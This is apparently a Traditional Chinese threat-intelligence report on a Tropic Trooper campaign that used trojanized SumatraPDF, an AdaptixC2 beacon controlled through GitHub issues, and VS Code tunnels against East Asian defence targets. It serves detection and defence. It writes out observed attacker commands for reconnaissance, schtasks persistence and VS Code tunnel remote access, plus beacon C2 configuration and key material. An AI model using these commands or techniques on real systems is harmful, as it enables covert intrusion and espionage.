【精選威脅情資】偽造軍事文件掩護滲透行動：Tropic Trooper 濫用 GitHub 與VS Code 通道， 鎖定台日韓執行隱蔽間諜攻擊

‍

危害與影響

此事件反映出一場具明確目標的網路間諜行動，並可高度歸因於 Tropic Trooper（亦稱 Earth Centaur 與 PiratePanda）。根據 Zscaler ThreatLabz，此攻擊活動利用內含軍事主題誘餌文件的惡意 ZIP 壓縮檔，鎖定台灣的中文使用者，以及南韓與日本的受害者。誘餌內容涵蓋武器系統、潛艦合作、無人系統與國防產業規劃等主題，強烈顯示其情報蒐集目標聚焦於國防、國家安全與戰略技術利益。

‍

分析師觀點

此事件主要是透過釣魚來引誘使用者感染惡意檔案，壓縮檔內有許多簡體中文檔名，提到了無人機、潛艦、元宇宙等偏向軍事的文件，因此可能是針對台灣情報或軍事相關的人員進行釣魚。另外使用 Github 當作 C2、開源的 AdaptixC2 當作攻擊框架，代表了現在攻擊組織傾向使用現成的工具，再客製化細節，降低被偵測的可能。

‍

描述

此威脅之所以值得關注，在於其結合了社交工程、木馬化合法軟體、隱蔽的多階段惡意程式，以及對受信任服務的濫用。攻擊者將初始 payload 偽裝成文件相關檔案，方式是使用遭木馬化的 SumatraPDF 可執行檔，接著透過分階段感染鏈部署 AdaptixC2 Beacon。之後，他們利用自訂的 GitHub 型命令與控制通道，並進一步濫用 Visual Studio Code tunnels，以取得對特定系統的遠端互動式存取。這種方法讓攻擊者得以將惡意活動混入合法軟體與廣泛受信任的雲端服務之中，使偵測與回應更加困難。

此攻擊活動的影響主要與目標端點遭入侵、持續性存取、偵察，以及潛在資料竊取有關。觀察到該惡意程式被用來蒐集系統與網路資訊、透過排程工作建立持久化機制，並從受感染機器中外洩檔案。若受害者被認定特別有價值，攻擊者便會透過部署 VS Code tunnels 升級其存取能力，顯示這是一種「精準人為操作」的入侵模式，目的在於長期監控與後續行動，而非隨機性的惡意程式散播。

從產業角度來看，此事件與東亞地區中與軍事、國防、政府、研究及戰略工業部門相關的組織與個人尤其相關。雖然相關報告未點名特定組織，但誘餌主題與受害者地理分布顯示，攻擊焦點是那些可能接觸敏感政策、技術或作業資訊的人員，與 Tropic Trooper 長期針對與國防情報及區域地緣政治利益相關產業的特點相符。

此威脅的另一個重要面向是攻擊者的技術成熟度。將 GitHub 作為命令與控制及資料外洩通道，再加上快速刪除 beacon 產生的痕跡，顯示其有意降低鑑識可視性，並阻礙防禦方分析通訊內容。這場攻擊活動也展現出與 Tropic Trooper 先前活動——尤其是 TAOTH 行動——的延續性，同時在工具面上藉由轉向 AdaptixC2 與自訂基礎設施而有所演進。這表明該組織仍然活躍、具適應能力，並持續投入長期情報蒐集行動。

技術分析

此事件入侵鏈包含多個階段，結合了木馬化合法應用程式、記憶體內載入器、經修改以進行隱蔽命令控制的開源 beacon，以及後續對受信任開發工具的濫用，以維持持續性遠端存取。整體而言，入侵始於受害者執行了一個偽裝成軍事主題文件的惡意檔案。該可執行檔實際上是一個被植入後門的 SumatraPDF 二進位檔，內含 TOSHIS 載入器；它會抓取一份誘餌 PDF 顯示給使用者，同時在背景中下載、解密並於記憶體內啟動 AdaptixC2 Beacon。接著，攻擊者使用自訂的 GitHub 型 listener 進行命令與控制，並在部分系統上部署 VS Code tunnels 以取得更具互動性的存取能力。以下各節將依 MITREATT&CK 戰術分類，說明此攻擊如何運作。

偵查（Reconaissance）

在建立初始立足點後，攻擊者主要利用 AdaptixC2 植入來評估受害環境，判斷某台系統是否值得進一步深入存取。其偵察活動同時包含本機與外部網路檢查。

觀察到的命令包括：

• arp /a，用以檢視     ARP 資料表並了解附近網路關係
• net view \\\\\\\\192.168.220.2，列舉遠端主機上可存取的資源
• tasklist | findstr /i note，尋找感興趣的執行中程序
• wmic process where processid=8528 get commandline，檢查程序執行細節
• curl -s 'ip.me?t=1&m=2' 與 curl ip.me?t=1&m=2，識別主機的公開 IP 位址

AdaptixC2Beacon 也會以硬編碼的 curl/8.5.0 User-Agent 查詢 ipinfo.io，以判定受害機器的外部 IP。這點之所以重要，是因為攻擊者所設計的 GitHub 型 C2 架構，並不會自然地將受害者來源 IP 暴露給操作者。

資源開發（Resource Development）

此次行動依賴攻擊者預先準備的基礎設施與客製化工具，而非僅使用一般化的商品型惡意程式。

攻擊者：

• 建立 GitHub 帳號與儲存庫 cvaS23uchsahs/rss，用於 C2 通訊
• 為 AdaptixC2 Beacon 開發自訂的 GitHub 型 listener
• 使用嵌入於木馬化 SumatraPDF 二進位檔中的自訂 TOSHIS 載入器
• 取得並部署開源的 AdaptixC2 Beacon 作為第二階段植入體    
• 在 58.247.193[.]100 準備中繼基礎設施，用於託管誘餌 PDF 與加密的第二階段 payload
• 透過 bashupload[.]app 等外部託管位置中繼其他工具，包括 VS Code

這種組合顯示其工具鏈具分層特性：自訂載入器開發、重新利用開源惡意程式，以及濫用合法雲端服務與開發工具。

初始存取（Initial Access）

初始存取仰賴使用者執行一個透過 ZIP 壓縮檔投遞的惡意檔案，該壓縮檔內含軍事主題誘餌。在多個誘餌文件中，關鍵 payload 是一個被命名為看似國防相關文件的可執行檔：「Comparative Analysis of US-UK and US-Australia NuclearSubmarine Cooperation (2025).exe」。雖然它看起來像與某份 PDF 誘餌相關，實際上卻是一個遭木馬化的 SumatraPDF 可執行檔。因此，這次攻擊依賴的是社交工程與使用者執行，而非利用軟體漏洞。

執行（Execution）

當受害者啟動這個假文件可執行檔時，惡意程式便開始執行一連串精心安排的惡意行為。

階段 1：木馬化 SumatraPDF 與 TOSHIS 載入器

該二進位檔與合法的開源 SumatraPDF 閱讀器極為相似。它保留了看似合法的中繼資料，包括憑證與 PDB 路徑，但由於檔案已遭修改，其程式碼簽章實際上是無效的。

與早期 TOSHIS 樣本中修改進入點的做法不同，這個版本是透過覆寫 _security_init_cookie 來劫持執行流程，將控制流重新導向攻擊者程式碼。這是一個值得注意的根本原因細節：惡意程式並非只是附加惡意邏輯，而是修改了早期執行階段的初始化函式，以確保後門邏輯會在正常程式行為之前執行。

被注入的函式會：

• 建立包含中繼 IP 位址、誘餌檔案路徑、DLL 名稱與加密材料的堆疊字串
• 使用 Adler-32 雜湊動態解析 Windows API
• 自 58.247.193[.]100 下載誘餌 PDF
• 使用 ShellExecuteW 啟動誘餌 PDF，以分散受害者注意力
• 從同一伺服器下載第二階段 Shellcode payload
• 使用 WinCrypt API 與 AES-128-CBC 解密該 payload
• 直接在記憶體中執行 Shellcode

研究分析顯示，AES 金鑰是透過 CryptDeriveKey，從硬編碼種子 424986c3a4fddcb6 的 MD5 雜湊衍生而來，而初始化向量則設為零。

階段 2：於記憶體中啟動 AdaptixC2 Beacon

解密後的 Shellcode 是一個 AdaptixC2 Beacon 代理程式。載入器並未將傳統可執行檔寫入磁碟，而是以反射式方式在記憶體中執行 payload ，藉此降低鑑識可視性，也使基於檔案的偵測更為困難。

立足點建立後的命令執行

當植入體啟動後，操作者會透過 beacon 下達命令，以進行偵察並準備後續存取。這些命令包括使用 Windows 命令殼層與 curl 來擷取額外 payload 與工具，其中包括 VS Code。

持久化（Persistence）

攻擊者透過排程工作建立持久化。觀察到的範例如下：

• schtasks /create /tn \\\\MSDNSvc /sc hourly /mo 2 /tr
  C:\\\\users\\\\public\\\\documents\\\\dsn.exe /f /RL HIGHEST
• schtasks /create /tn \\\\MicrosoftUDN /sc hourly /mo 2 /f /tr
  C:\\\\Users\\\\Public\\\\Documents\\\\MicrosoftCompilers.exe    
  C:\\\\Users\\\\Public\\\\Documents\\\\2.library-ms

他們也曾手動觸發其中一個工作：

• schtasks /run /i /tn \\\\MicrosoftUDN

這些工作被設定為每兩小時執行一次，有助於攻擊者在重新開機或中斷後維持存取。

權限提升（Privilege Escalation）

一個明確的高權限執行例子，是使用 /RL HIGHEST 建立排程工作：

• schtasks /create /tn \\\\MSDNSvc ... /RL HIGHEST

這表示攻擊者可能已具備足夠權限，或當時處於允許其以最高執行等級建立排程工作的情境中。雖然報告未詳述權限提升的漏洞利用，但此命令顯示其利用高權限執行來強化持久化與控制能力。

防禦規避（Defense Evasion）

偽裝成合法軟體
初始惡意程式被嵌入木馬化的 SumatraPDF 可執行檔中，保留了看似合法的憑證資訊與正常應用程式外觀。這提高了檔案被使用者信任，或在粗略檢查中被忽略的機率。

無效程式碼簽章的偽裝效果
雖然在木馬化後原始簽章已失效，但熟悉的供應商相關中繼資料仍有助於該檔案偽裝成無害軟體。

動態 API 解析
載入器以 Adler-32 雜湊來解析 API，而非以明文儲存 API 名稱，這降低了靜態分析中的明顯指標。

加密的第二階段
第二階段 Shellcode 以加密形式儲存，且僅在記憶體中使用 AES-128-CBC 解密，藉此使真正的 payload 不易被簡單的檔案掃描發現。

反射式程式碼載入
AdaptixC2 Beacon 直接於記憶體中執行，而不是以標準 DLL 或 EXE 形式寫入磁碟，從而減少檔案痕跡。

偽裝的排程工作
持久化工作被命名為 \\\\MSDNSvc 與 \\\\MicrosoftUDN 等名稱，設計上類似合法 Windows 或企業軟體元件。

濫用受信任工具
該活動後續濫用了 VS Code 與 Roslyn/Microsoft 編譯器元件等合法工具。透過開發者工具進行操作，攻擊者得以將惡意活動混入企業環境中原本可能就被允許的軟體。

GitHubC2 的作業安全
GitHub beacon issue 通常會在約 10 秒內被刪除。這很可能是為了銷毀工作階段的金鑰，並阻礙被動監控或事後分析 C2 流量。

探索（Discovery）

操作者使用原生命令來了解受感染主機及其周邊環境。探索活動包括：

• arp /a，取得本機網路配置線索
• 對 ipinfo.io 與 ip.me 發出請求，以識別外部 IP
• net view \\\\\\\\192.168.220.2，檢視可存取的網路資源
• tasklist | findstr /i note，識別執行中的程序
• wmic process where processid=8528 get commandline，檢查程序細節

此探索階段似乎是用來支援受害者分級：只有被認定為有價值的系統，才會被推進到更具互動性的 VS Code tunnel 階段。

橫向移動（Lateral Movement）

在此攻擊活動中，最重要的橫向移動支援能力，是濫用 VS Code tunnels 進行遠端存取。

觀察到的命令包括：

• cd C:\\\\Users\\\\Public\\\\Documents & code tunnel user login --provider github > z.txt
• code tunnel user login --provider github > z.txt
• tasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txt

在作業上，攻擊者似乎先使用 AdaptixC2 進行初始存取與偵察，接著將部分受害者提升到更具人工操作性的階段，方式是安裝或呼叫 VS Code 的 tunnel 功能。這讓他們能透過一項與 GitHub 驗證綁定的合法服務取得互動式遠端存取。

命令 netview \\\\\\\\192.168.220.2 也顯示，他們曾檢查可連線的遠端系統與共享資源，這可能支援了環境內部的移動或擴張。

蒐集（Collection）

AdaptixC2Beacon 透過其 fileupload 任務機制支援從本機系統蒐集檔案。實務上，操作者可以下達任務，從受害主機擷取特定檔案，顯示該惡意程式也內建了蒐集感興趣資料以供後續外洩的能力。

命令與控制（Command and Control）

此事件中的命令與控制，是整場攻擊活動在技術上最具辨識度的部分之一。

第一階段下載基礎設施

木馬化的SumatraPDF/TOSHIS 載入器透過明文 HTTP 聯繫 58.247.193[.]100，並擷取：

• 誘餌 PDF
• 加密的第二階段 Shellcode

該伺服器也託管了其他與 Tropic Trooper 相關的惡意程式，包括 EntryShell 與 Cobalt Strike Beacon。

自訂 GitHub 型 AdaptixC2 listener

第二階段植入體是一個AdaptixC2 Beacon，設定為使用自訂的 GitHub listener，而非標準 HTTP 或 TCP listener。擷取出的設定包括：

• repository owner：cvaS23uchsahs
• repository name：rss
• API host：api.github.com
• issues path：repos/cvaS23uchsahs/rss/issues?state=open
• sleep delay：60 秒
• jitter：42
• RC4 config key：7adf76418856966effc9ccf8a21d1b12

在啟動時，beacon 會使用 RtlRandomEx(GetTickCount()) 產生一組 16 位元組 RC4 工作階段金鑰。它也會產生一個隨機的 4 位元組 agent ID，且每次惡意程式初始化時都會重新生成。由於 GitHub 不會向操作者揭露受害者來源 IP，植入體會查詢 ipinfo.io，並將外部 IP 納入 beacon 流量中。

基於 GitHubissue 的工作流程

Beacon 透過 POST 到 GitHub Issue #1 來建立工作階段。接著，它會輪詢開啟中的 issues 以擷取命令。惡意程式並未使用完整的 JSON 解析器，而是透過子字串比對來擷取 issue 編號、標題與內文等欄位。

任務處理邏輯依 issue 標題而定：

• beat:：視為心跳     issue，跳過不作為任務
• 以 upload 開頭且以 .txt 結尾的標題：解讀為任務檔案，通常內嵌 agent ID
• 以 fileupload 開頭的標題：視為檔案外洩指令    
• 其他標題：經 Base64 解碼後視為命令

處理任務後，植入體會準備回應內容，包括：

• 先前加密過的 beacon 封包
• 以 RC4 工作階段金鑰加密的任務輸出

這個合併後的緩衝區會再經 Base64 編碼，並作為儲存庫內容檔案上傳回 GitHub。若資料大於 30 MB，則會切分為 30 MB 區塊。之後，植入體會張貼 issue 留言，指出哪個上傳檔案對應某一命令，並以 |@@@| 作為多段回應的分隔符。這種設計讓攻擊者能透過受信任的雲端服務實現完整的雙向 C2，同時將流量混入對 GitHub 的正常 HTTPS 請求中。

額外工具傳輸與遠端存取

攻擊者也使用 curl 從以下位置抓取工具與 payload ：

• code.visualstudio.com
• bashupload[.]app

這支援了 VSCode 與其他後續元件的部署。

資料外洩（Exfiltration）

資料外洩是透過與任務下發相同的 GitHub 型 C2 通道進行的。

AdaptixC2Beacon 的 fileupload 功能允許操作者向受感染系統請求檔案。植入體隨後會：

• 蒐集指定檔案
• 加密回應資料
• 將完整 payload 進行 Base64 編碼
• 以內容形式上傳至 GitHub 儲存庫
• 必要時將大型檔案切分為 30 MB 區塊
• 張貼 issue 留言，指出上傳結果檔案

將 GitHub 同時作為 C2 與外洩平台，降低了對獨立攻擊者基礎設施的需求，也使惡意流量更難與合法開發者活動區分。

整體而言，此次入侵的根本原因，是使用者成功執行了一個偽裝成相關軍事主題文件的木馬化可執行檔。這場攻擊活動的技術成熟度，體現在它如何將這次初始執行轉化為一場隱蔽的多階段入侵：在受信任應用程式內部劫持控制流程、加密的記憶體內 payload 投遞、客製化的 GitHub 型 AdaptixC2 通道，以及最終濫用 VS Code tunnels 以取得持久且可人工操作的存取能力。

緩解措施

由於此事件並未依賴已公開揭露的軟體漏洞，緩解措施應聚焦於防止使用者執行、限制受信任服務遭濫用、偵測多階段惡意程式行為，以及限制入侵後的持久化與遠端存取。實務上，最受影響的控制與服務可能包括電子郵件與網頁安全、端點防護、應用程式控制、對外網路政策、GitHub 存取、VS Code tunnel 使用、Windows 工作排程器監控，以及威脅狩獵流程。

1. 降低初始執行風險

此次攻擊始於一個惡意 ZIP 壓縮檔，其中包含偽裝成文件相關檔案的可執行檔。因此，組織應強化對傳送給使用者的壓縮檔與可執行檔的控制。

建議措施包括：

• 封鎖或隔離內含可執行內容的 ZIP 壓縮檔，尤其是檔名模仿文件者。    
• 對自網際網路下載的檔案強制套用 Mark-of-the-Web、SmartScreen 或同等信譽檢查。
• 使用 WDAC 或 AppLocker 等應用程式白名單機制，僅允許核准的二進位檔執行。
• 拒絕或針對無效程式碼簽章發出警示，因為木馬化的 SumatraPDF 雖保留看似合法的中繼資料，但修改後簽章已失效。
• 限制從使用者可寫入與常見中繼位置執行，例如 Downloads、Temp、%LOCALAPPDATA% 與公用文件資料夾。

這些控制將直接影響端點執行政策、附件處理、瀏覽器下載保護與軟體信任設定。

2. 偵測並阻擋第二階段投遞

載入器會從攻擊者基礎設施下載誘餌 PDF 與加密的第二階段 payload ，並在記憶體中執行該 payload 。為降低暴露風險：

• 封鎖後面 IoC 章節中列出的已知惡意基礎設施與檔案指標，包括中繼 IP、列出的 URL 與雜湊值。
• 使用網頁代理或安全網頁閘道控制，防止直接對不受信任 IP 進行 HTTP/HTTPS 對外連線與可疑檔案下載。
• 對可疑可執行檔與壓縮檔啟用沙箱分析，在其到達端點前識別多階段載入器。

3. 干擾持久化與入侵後活動

操作者建立了帶有偽裝名稱的排程工作，並使用常見命令列工具進行偵察、中繼與存取設定。組織應：

• 監控排程工作的建立或修改，尤其是像 \\\\MSDNSvc 與 \\\\MicrosoftUDN 這類可疑名稱。
• 對從公用或使用者可寫入目錄執行的排程工作發出警示。
• 偵測 curl、schtasks、tasklist、wmic、net view 與 arp 的可疑使用，特別是當它們同時出現或出現在異常使用者情境中時。
• 留意與該活動相關的痕跡，包括 z.txt、z2.txt、v.zip、.dat     payload ，以及中繼於 C:\\\\Users\\\\Public\\\\Documents\\\\ 的二進位檔。
• 限制本機管理員權限，以降低攻擊者建立持久化與執行高完整性工作的能力。

這些緩解措施主要會影響 Windows 記錄、Sysmon／EDR遙測、權限管理、排程工作稽核與命令列分析。

參考資料

•         Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener

•         中國駭客 Tropic Trooper 鎖定臺灣、日本、韓國，透過 Adaptix C2 與 VS Code 隧道控制受害電腦

•         Untrusted Search Path in sumatrapdf/src/AppTools.cpp

•         #StopRansomware: ALPHV Blackcat

•         Tropic Trooper Uses Trojanized SumatraPDF and GitHub to Deploy AdaptixC2

入侵指標 (Indicator of Compromise, IoCs)

Network IoC 分析

這批 IoC 呼應了 Tropic Trooper「高隱蔽、濫用合法服務」的攻擊特徵，有兩大特點值得注意：

1. 濫用公有雲與 CDN：惡意 IP 與網域架設於 Vultr、阿里雲及 Cloudflare。攻擊者不再自建跳板，而是藉由受信任的雲端服務掩護 C2 流量，大幅增加單純封鎖 IP 的難度。
2. 在地化隱蔽：惡意跳板設於南韓與香港，精準貼近台日韓目標國以繞過地理封鎖；且網域（lsmartv.com）具生活化欺騙性，易躲過日誌審查。

Files

Network